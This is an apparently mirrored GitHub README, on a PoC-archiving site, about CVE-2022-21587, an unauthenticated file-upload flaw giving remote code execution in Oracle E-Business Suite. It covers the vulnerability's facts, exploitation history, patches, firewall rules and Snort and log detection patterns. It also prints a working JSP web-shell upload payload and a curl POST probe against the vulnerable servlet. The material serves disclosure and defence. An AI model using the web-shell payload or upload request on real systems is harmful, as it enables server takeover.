Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-21587 PoC — Oracle E-Business Suite 访问控制错误漏洞

Source
https://github.com/B1ack4sh/Blackash-CVE-2022-21587
Associated Vulnerability
Title:Oracle E-Business Suite 访问控制错误漏洞 (CVE-2022-21587)
Description:Oracle E-Business Suite(电子商务套件)是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。 Oracle E-Business Suite 的 Oracle Web Applications Desktop Integrator 12.2.3-12.2.11 版本存在安全漏洞。未经身份验证的攻击者通过 HTTP 进行网络访问,从而破坏 Oracle Web Applications Desktop Integrat
Description
CVE-2022-21587
Readme
# 🚨 **CVE-2022-21587** – Critical Oracle E-Business Suite RCE via unauthenticated file upload! ⚠️

## 🔍 **Quick Facts**

- **CVE ID**: CVE-2022-21587  
- **Published**: October 18, 2022  
- **Updated**: Last modified May 2023 (NVD)  
- **CVSS v3.1 Base Score**: 9.8 (Critical)  
  - Attack Vector: Network 🌐  
  - Attack Complexity: Low  
  - Privileges Required: None  
  - User Interaction: None  
  - Scope: Unchanged  
  - Confidentiality/Integrity/Availability: High/High/High  
- **CWE**: CWE-434 (Unrestricted Upload of File with Dangerous Type)  
- **Vendor**: Oracle Corporation  
- **Product**: Oracle E-Business Suite  
- **Affected Component**: Web Applications Desktop Integrator (Forms)  
- **Root Cause**: Improper validation of file uploads in `BneUploaderServlet`  

---

##🔥 **Vulnerability Mechanics**

<img width="802" height="256" alt="uuencoding" src="https://github.com/user-attachments/assets/059d923f-3ce9-498e-9ab4-ec7184dd54fb" />

Attackers send crafted HTTP POST requests to:  
```
POST /OA_HTML/BneUploaderServlet HTTP/1.1
```  
with malicious `.class` or `.jsp` payloads disguised as legitimate uploads. No login required! 🔓  

Example payload snippet (PoC-style):  
```http
Content-Disposition: form-data; name="uploadFile"; filename="evil.jsp"
Content-Type: application/octet-stream

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```  
→ Executes arbitrary OS commands on the server 🧨

<img width="1920" height="956" alt="CVE-2022-21587" src="https://github.com/user-attachments/assets/46000759-9a74-42df-9959-f71f635fed1c" />

---

##🛠️ **Exploitation in the Wild**  

- **First Observed**: January 2023  
- **CISA KEV Catalog**: Added February 2, 2023 (Deadline: Feb 23, 2023 for FCEB)  
- **Threat Actors**:  
  - Used in ransomware precursor campaigns  
  - Automated scanners (Mirai-like bots, custom Python scripts)  
  - Public PoCs on GitHub (search: `CVE-2022-21587 exploit`)  
- **Notable Incidents**:  
  - Rapid7 MDR: Multiple customer compromises in Feb 2023  
  - Shadowserver: Scanning spikes post-disclosure
 

<img width="899" height="281" alt="Step-1" src="https://github.com/user-attachments/assets/ad89209d-567b-4e3a-bfe1-8374bb3cd2cb" />

---

## 🎯 **Affected Versions** (Unpatched)  

| Release | Patched In |
|--------|------------|
| 12.1.1 – 12.1.3 | Oct 2022 CPU |
| 12.2.3 – 12.2.12 | Oct 2022 CPU |

> **Note**: Only systems with **Web Applications Desktop Integrator** enabled are vulnerable.

---

## 🛡️ **Mitigation & Hardening**  

<img width="572" height="612" alt="Capture-d--cran-2024-07-19---14 57 29" src="https://github.com/user-attachments/assets/28028741-0458-47b4-b4af-1c78c9b8fec6" />

1. **Apply Patch** ✅  
   - Download: [Oracle CPU Oct 2022](https://www.oracle.com/security-alerts/cpuoct2022.html)  
   - Patch IDs: `34416369`, `34416370` (per release)  

2. **Network Segmentation** 🔒  
   ```bash
   # Example: Block external access
   iptables -A INPUT -p tcp --dport 8000 -s 192.168.0.0/16 -j ACCEPT
   iptables -A INPUT -p tcp --dport 8000 -j DROP
   ```

3. **WAF / IPS Rules** 🛑  
   - Block `.jsp`, `.class`, `.jar` in `/OA_HTML/`  
   - Signature example (Snort):  
     ```
     alert tcp any any -> $HTTP_SERVERS 80 (msg:"CVE-2022-21587 Attempt"; flow:to_server; content:"BneUploaderServlet"; http_uri; pcre:"/BneUploaderServlet/i"; classtype:web-application-attack; sid:1000001;)
     ```

4. **Detection Queries** 🔍  
   - **Web Logs**:  
     ```apache
     *BneUploaderServlet* AND (*..jsp* OR *..class*)
     ```  
   - **SIEM**: Look for `POST /OA_HTML/BneUploaderServlet` with `Content-Type: multipart/form-data`

5. **Disable if Unused**  
   - Deactivate WebADI via System Administrator responsibility if not needed.

---

## 🔗 **Official References**  

- [NVD – CVE-2022-21587](https://nvd.nist.gov/vuln/detail/CVE-2022-21587)  
- [Oracle Security Alert](https://www.oracle.com/security-alerts/cpuoct2022.html#AppendixEBS)  
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) (Search CVE)  
- [Rapid7 Blog – Exploitation Trends](https://www.rapid7.com/blog/post/2023/02/15/cve-2022-21587-oracle-e-business-suite-vulnerability-exploitation/)  

---

## ⚡ **Bonus: Quick Health Check Script (Bash)**  

```bash
#!/bin/bash
URL="http://your-ebs-host:8000/OA_HTML/BneUploaderServlet"
curl -s -o /dev/null -w "%{http_code}" -X POST "$URL" -F "uploadFile=@test.txt"
# Returns 200? → Likely vulnerable (pre-patch behavior)
```

---
File Snapshot

 [4.0K]  /data/pocs/22ee68914a2c1bfb401d4f9b932c9ea020c200f6
├── [1.7K]  CVE-2022-21587.py
├── [3.9K]  CVE-2022-21587.yaml
└── [4.4K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.